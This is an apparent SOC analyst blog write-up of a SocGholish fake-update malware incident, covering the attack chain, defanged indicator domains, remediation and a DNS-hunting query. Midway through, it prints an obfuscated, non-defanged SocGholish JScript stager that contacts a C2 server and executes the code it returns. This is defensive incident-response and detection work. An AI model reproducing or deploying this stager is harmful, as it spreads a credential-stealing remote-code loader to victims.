====================
== Alert Overload ==
====================
Tales from a SOC analyst

SocGholish

SocGholish

This writeup was originally produced for internal enterprise documentation and has been stripped of some details.

SocGholish is a well-known malware campaign that masquerades as software updates, typically for browsers, to trick users into downloading malicious files. Often, SocGholish uses compromised websites to accomplish this task. WordPress sites are particularly vulnerable if default configurations are not changed. On February 27th, 2024, an EDR alert lead to the discovery of SocGholish malware on a state device. The EDR solution worked as intended and blocked the process from running. Further analysis found that a local Minnesota website was compromised and serving the malware. A search was conducted, and, in total, 12 distinct devices had visited the compromised website in the past 30 days (02/07/2024-03/07/2024). No evidence suggests that any compromise of state devices occurred.

Attack Chain

  1. The user visits a compromised website (ecowaterminnesota.com)
  2. An embedded script covers the screen and executes a linked malicious script.
  3. The malicious script contains the SocGholish payload.
  4. A fake update page is loaded over the screen, prompting the user to download a software update.
  5. The downloaded file is a JavaScript file often named “update”, “version”, or some other software updated related name.
  6. The user executes the “update” file, and the malware connects to a Command and Control (C2) server.
  7. Data is exfiltrated and in some cases, lateral movement or secondary payloads may be executed.

alt text

Manual Incident Review and Attribution

On February 27th, 2024, the Enterprise Security Operations Center (SOC) was notified of a high alert pertaining to a file named “Update.js”. This file attempted to execute via wscript, and the Endpoint Detection and Response (EDR) solution successfully blocked the process. Further analysis of the file determined that it contained malicious JavaScript code utilizing Base64 encoded strings and bytecode. Analysis of the code in enterprise sandbox environments determined that it used process injection to execute a payload designed to replace and harvest registry keys, mailbox related information, and establish communications with a Command and Control (C2) server. Utilizing EDR tools, a correlation of browsing events and downloads found that the file was downloaded by the user after visiting the compromised website hxxps[://]ecowaterminnesota[.]com/. Investigation of this website lead to the discovery of embedded JavaScript content linking to several malicious domains.

URL Content Embed
hxxps[://]ecowaterminnesota[.]com/wp-content/cache/min/1/9659650c81ce1b984c58[.]js?ver=1709046791 Self-link to a hosted JavaScript file. Contains a function that loads a specified JavaScript source file and returns the element. Embedded in a viewport element that covers the current screen.
hxxps[://]pluralism[.]themancav[.]com/lbK9kO6Q3vnxkIeio4aRsueQh7L82d/o+dXbsug=' The malicious payload linked to SocGholish via address resolution in Open-Source Intelligence (OSINT) tools. Embedded in the above script. This script loads the malicious software update page.

Analysis

The fraudblocker domain loaded a script file that used region detection and ad block detection capabilities to serve malicious websites and advertisements. Most of the domains contained within the linked script file were blocked by the Secure Internet Gateway (SIG) tool. A block list was created for manual entry and rule creation. The script served these URLs through Base64 encoded strings, which were decoded and constructed in real time [Figure 1 and Figure 2]. The complete script is attached to this report.

alt text

The self-linked JavaScript file contained a singular file used to import the malicious payload script [Figure 3]. This function loads the payload script into the passed viewport. The viewport, or rendered page, is then overridden to display the malicious software update screen [Figure 5].

alt text

The malicious software update screen downloads a JavaScript file that contains Base64 encoded strings and bytecode/shellcode. This script steals mail credentials, enumerates registry keys, and establishes communications to a C2 server. The script sends encrypted traffic back to the C2 server at wxadl[.]collection[.]aixpirts[.]com [Figure 4].

alt text

alt text

Remediation

In all identified incidents, the EDR solution successfully blocked the execution of the script. As such, remediation efforts focused on removal of the malware file and the creation of extended block lists for involved domains. Identified malicious domains were blocked in the SIG tool. All blocked domains are included in the listed IOCs. Malicious scripts have been attached with this report. These scripts have not been defanged and are provided as found. Take caution when performing further analysis.

Detection and Removal

When an incident occurs involving a suspicious Update.js file, the presence of SOCGHOLISH can be confirmed via recovery of the infected file. SOCGHOLISH payloads typically (as of 11/2024) look something like this:


/*@cc_on
function a0_0x6c2f(){var _0x4d0653=['udu4rgu','zvrkBtu','ys5VCMC','AhnPzgu','y3rPB24','mtvvshDSCwq','nty0ntjUtw51Cwe','CMvZCg8','sgvHzgu','ue9tva','mJeZnZmYsfHTtw9s','zhrRqwu','qwn0Axy','B3bLBG','zxj2Awm','tvnytuW','u3rHDgu','ntiYmtKWEMjRyvzx','zxzHBa','A2vLCc0','u2XLzxa','zvHpyMO','ywXPDMu','zc9Jz1m','mteYmtmYnxjdrKfRCq','y2H1CMm','v1ni','CMLZDgW','mI5ytuW','lNnVDxq','mtnKvw5SqK4','AgfUDfm','ndLcEhPKsNi','nde4mJjYwwfQA20','otLNzNnyuhu','q29UBMu','q0Dgrdm','mJi4nJC4nMDdrxvkuG','BM12qwS','CxvLC3q','BNnL','mtm0nfHhwMTHEq','vgv4Da','sfruua','mtiYnJa4whHlsfzx','zwn0','C2vUza','mtzlwJG','Ag9My2G','C1e9pq','wur3u1y','l21LCMm','oI8VzNK','CMvHzhK','Ahr0Chm','C3nVBNm','C2v0uMu','DMqUBgu'];a0_0x6c2f=function(){return _0x4d0653;};return a0_0x6c2f();}(function(_0x36c4be,_0x3f1982){var a0_0x580e76={_0x519d24:0x410,_0x5d3199:0x404,_0x316d48:0x3d9,_0x1515f1:0x3cd,_0x25f7eb:0x3d2,_0x4ae9c5:0x3eb,_0x1f20e7:0x3e2,_0x11d2f7:0x3f0,_0x301625:0x3ed,_0x2fa1f3:0x3fe,_0x1bd980:0x3e0,_0x9ebab5:0x3d1,_0x243f1b:0x3bf,_0x52fbf3:0x3cc,_0x1948f9:0x3c4,_0x328397:0x3d8,_0x2677a3:0x3ce,_0x3608ec:0x3f7,_0x341588:0x3ec,_0x435d16:0x3d5},a0_0x4eb24c={_0x3cc6e1:0x27e};function _0x373699(_0x15132a,_0x128e6a){return a0_0x9fb4(_0x128e6a-a0_0x4eb24c._0x3cc6e1,_0x15132a);}var _0x2cc6bb=_0x36c4be();while(!![]){try{var _0x9134d5=parseInt(_0x373699(a0_0x580e76._0x519d24,a0_0x580e76._0x5d3199))/0x1*(-parseInt(_0x373699(a0_0x580e76._0x316d48,a0_0x580e76._0x1515f1))/0x2)+parseInt(_0x373699(a0_0x580e76._0x25f7eb,a0_0x580e76._0x4ae9c5))/0x3*(parseInt(_0x373699(a0_0x580e76._0x1f20e7,a0_0x580e76._0x11d2f7))/0x4)+parseInt(_0x373699(a0_0x580e76._0x301625,a0_0x580e76._0x2fa1f3))/0x5+parseInt(_0x373699(a0_0x580e76._0x1bd980,a0_0x580e76._0x9ebab5))/0x6+parseInt(_0x373699(a0_0x580e76._0x243f1b,a0_0x580e76._0x52fbf3))/0x7*(-parseInt(_0x373699(a0_0x580e76._0x1948f9,a0_0x580e76._0x328397))/0x8)+parseInt(_0x373699(a0_0x580e76._0x1f20e7,a0_0x580e76._0x2677a3))/0x9*(parseInt(_0x373699(a0_0x580e76._0x1f20e7,a0_0x580e76._0x3608ec))/0xa)+-parseInt(_0x373699(a0_0x580e76._0x4ae9c5,a0_0x580e76._0x341588))/0xb*(parseInt(_0x373699(a0_0x580e76._0x341588,a0_0x580e76._0x435d16))/0xc);if(_0x9134d5===_0x3f1982)break;else _0x2cc6bb['push'](_0x2cc6bb['shift']());}catch(_0x1624ea){_0x2cc6bb['push'](_0x2cc6bb['shift']());}}}(a0_0x6c2f,0x78605));function a0_0x9fb4(_0x1501e6,_0x5c0323){var _0x6c2f40=a0_0x6c2f();return a0_0x9fb4=function(_0x9fb449,_0x3914b4){_0x9fb449=_0x9fb449-0x14d;var _0x25819d=_0x6c2f40[_0x9fb449];if(a0_0x9fb4['chYAjT']===undefined){var _0x321c5d=function(_0x5810ac){var _0x33578a='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x24cba7='',_0x438632='';for(var _0x2925af=0x0,_0x377ebd,_0x80662f,_0x2d8d1c=0x0;_0x80662f=_0x5810ac['charAt'](_0x2d8d1c++);~_0x80662f&&(_0x377ebd=_0x2925af%0x4?_0x377ebd*0x40+_0x80662f:_0x80662f,_0x2925af++%0x4)?_0x24cba7+=String['fromCharCode'](0xff&_0x377ebd>>(-0x2*_0x2925af&0x6)):0x0){_0x80662f=_0x33578a['indexOf'](_0x80662f);}for(var _0x29a7da=0x0,_0x228b7d=_0x24cba7['length'];_0x29a7da<_0x228b7d;_0x29a7da++){_0x438632+='%'+('00'+_0x24cba7['charCodeAt'](_0x29a7da)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x438632);};a0_0x9fb4['KmPpFx']=_0x321c5d,_0x1501e6=arguments,a0_0x9fb4['chYAjT']=!![];}var _0x565532=_0x6c2f40[0x0],_0x6bcc8d=_0x9fb449+_0x565532,_0x183405=_0x1501e6[_0x6bcc8d];return!_0x183405?(_0x25819d=a0_0x9fb4['KmPpFx'](_0x25819d),_0x1501e6[_0x6bcc8d]=_0x25819d):_0x25819d=_0x183405,_0x25819d;},a0_0x9fb4(_0x1501e6,_0x5c0323);}function a0_0x5810ac(_0x438632){var a0_0x3c5b31={_0xd4b56a:0x16b,_0xf0c6d1:0x170,_0x4e44d6:0x157,_0x5791ca:0x157,_0x3e75b3:0x171,_0xa57522:0x159},a0_0x18eee5={_0x4c4e4b:0x1},_0x2925af=_0x5a66b9(a0_0x3c5b31._0xd4b56a,a0_0x3c5b31._0xf0c6d1)+_0x5a66b9(a0_0x3c5b31._0x4e44d6,a0_0x3c5b31._0x5791ca),_0x377ebd=_0x2925af+_0x5a66b9(a0_0x3c5b31._0x3e75b3,a0_0x3c5b31._0xa57522);function _0x5a66b9(_0x147a50,_0x53fffd){return a0_0x9fb4(_0x53fffd-a0_0x18eee5._0x4c4e4b,_0x147a50);}var _0x80662f=_0x438632[_0x377ebd];return _0x80662f;};function a0_0x31636c(_0x3bdf37,_0x1a16e7){var a0_0x1447c1={_0x376164:0x2db};return a0_0x9fb4(_0x1a16e7-a0_0x1447c1._0x376164,_0x3bdf37);}function a0_0x33578a(_0x2d8d1c){return _0x2d8d1c;};var a0_0x24cba7=new this[(a0_0x31636c(0x458,0x44f))+(a0_0x31636c(0x44b,0x458))+(a0_0x31636c(0x441,0x436))](a0_0x31636c(0x449,0x452)+a0_0x31636c(0x472,0x45f)+a0_0x31636c(0x424,0x434));a0_0x24cba7[a0_0x31636c(0x465,0x450)](a0_0x31636c(0x438,0x44c),a0_0x31636c(0x42e,0x43f)+a0_0x31636c(0x435,0x43d)+a0_0x31636c(0x43e,0x442)+a0_0x31636c(0x44e,0x440)+a0_0x31636c(0x45a,0x460)+a0_0x31636c(0x449,0x446)+a0_0x31636c(0x456,0x45c)+a0_0x31636c(0x446,0x439)+a0_0x31636c(0x46d,0x45e)+a0_0x31636c(0x43e,0x445)+a0_0x31636c(0x42c,0x43c)+a0_0x31636c(0x41a,0x428)+a0_0x31636c(0x43c,0x451)+'es',!![]),a0_0x24cba7[a0_0x31636c(0x42d,0x441)+a0_0x31636c(0x445,0x430)+a0_0x31636c(0x440,0x44b)+'r'](a0_0x31636c(0x41f,0x42c)+a0_0x31636c(0x440,0x447),a0_0x31636c(0x443,0x456)+a0_0x31636c(0x45b,0x459)),a0_0x24cba7[a0_0x31636c(0x422,0x437)](a0_0x31636c(0x428,0x43b)+a0_0x31636c(0x450,0x44e)+a0_0x31636c(0x46b,0x45a)+a0_0x31636c(0x424,0x42d)+a0_0x31636c(0x43b,0x443)+a0_0x31636c(0x429,0x444)+a0_0x31636c(0x439,0x438)+a0_0x31636c(0x41c,0x42f)+a0_0x31636c(0x431,0x43a));while(!![]){this[a0_0x31636c(0x475,0x45d)][a0_0x31636c(0x43d,0x457)](0x3e8);if(a0_0x24cba7[a0_0x31636c(0x421,0x43e)+a0_0x31636c(0x455,0x453)]==0x4){this[a0_0x31636c(0x43a,0x455)](a0_0x33578a(a0_0x5810ac(a0_0x24cba7)));break;}}
@*/

To find the initial delivery domain, use the query for DNS investigations.

ComputerName = ?ComputerName | #repo=base_sensor cid="*"  | in(#event_simpleName, values=[DnsRequest, SuspiciousDnsRequest, *FileWritten]) | ContextBaseFileName = "chrome.exe" or ContextBaseFileName = "firefox.exe" or ContextBaseFileName =  "msedge.exe" | Time := formatTime("%FT%TZ", field=timestamp, timezone= "America/Chicago")  | table(["Time","#event_simpleName","ComputerName","Agent IP","LocalAddressIP4","DomainName", "ContextImageFileName", "FilePath","FileName","OriginalFilename","ContextProcessId"], limit=5000) | sort(Time, limit=5000)

This will show all DNS and file events for the given host.

Work through the domains that appear just before the intial detection time to find the infected domain. In this case, it was northeastiowarcd[.]org.

Using a sandbox, visit the domain and inspect the page source. In the source, you should be able to identify an async script injection.

This is usually the source domain for the malware delivery system. Often, but not always, you will also be able to trigger the malware delivery system on the domain. Typically, it will match your browser and offer a “FakeUpdate”.

alt text

In the console, look for a ScriptControlBlocked event in the process chain for the detection. This event will contain the cleartext - decoded - script that the payload attempted to execute.
You can access this event by clicking the Investigate Event menu item in the detection.

There were cool images here, but they got removed :(

In this script is the C2 domain the malware pushes data to.

After identifying the infected domain and the malware delivery domain, block all associated domains in Umbrella. If the infected domain has listed contact information, consider sending them a notification that they are infected with SOCGHOLISH. I find that most domain owners are appreciative.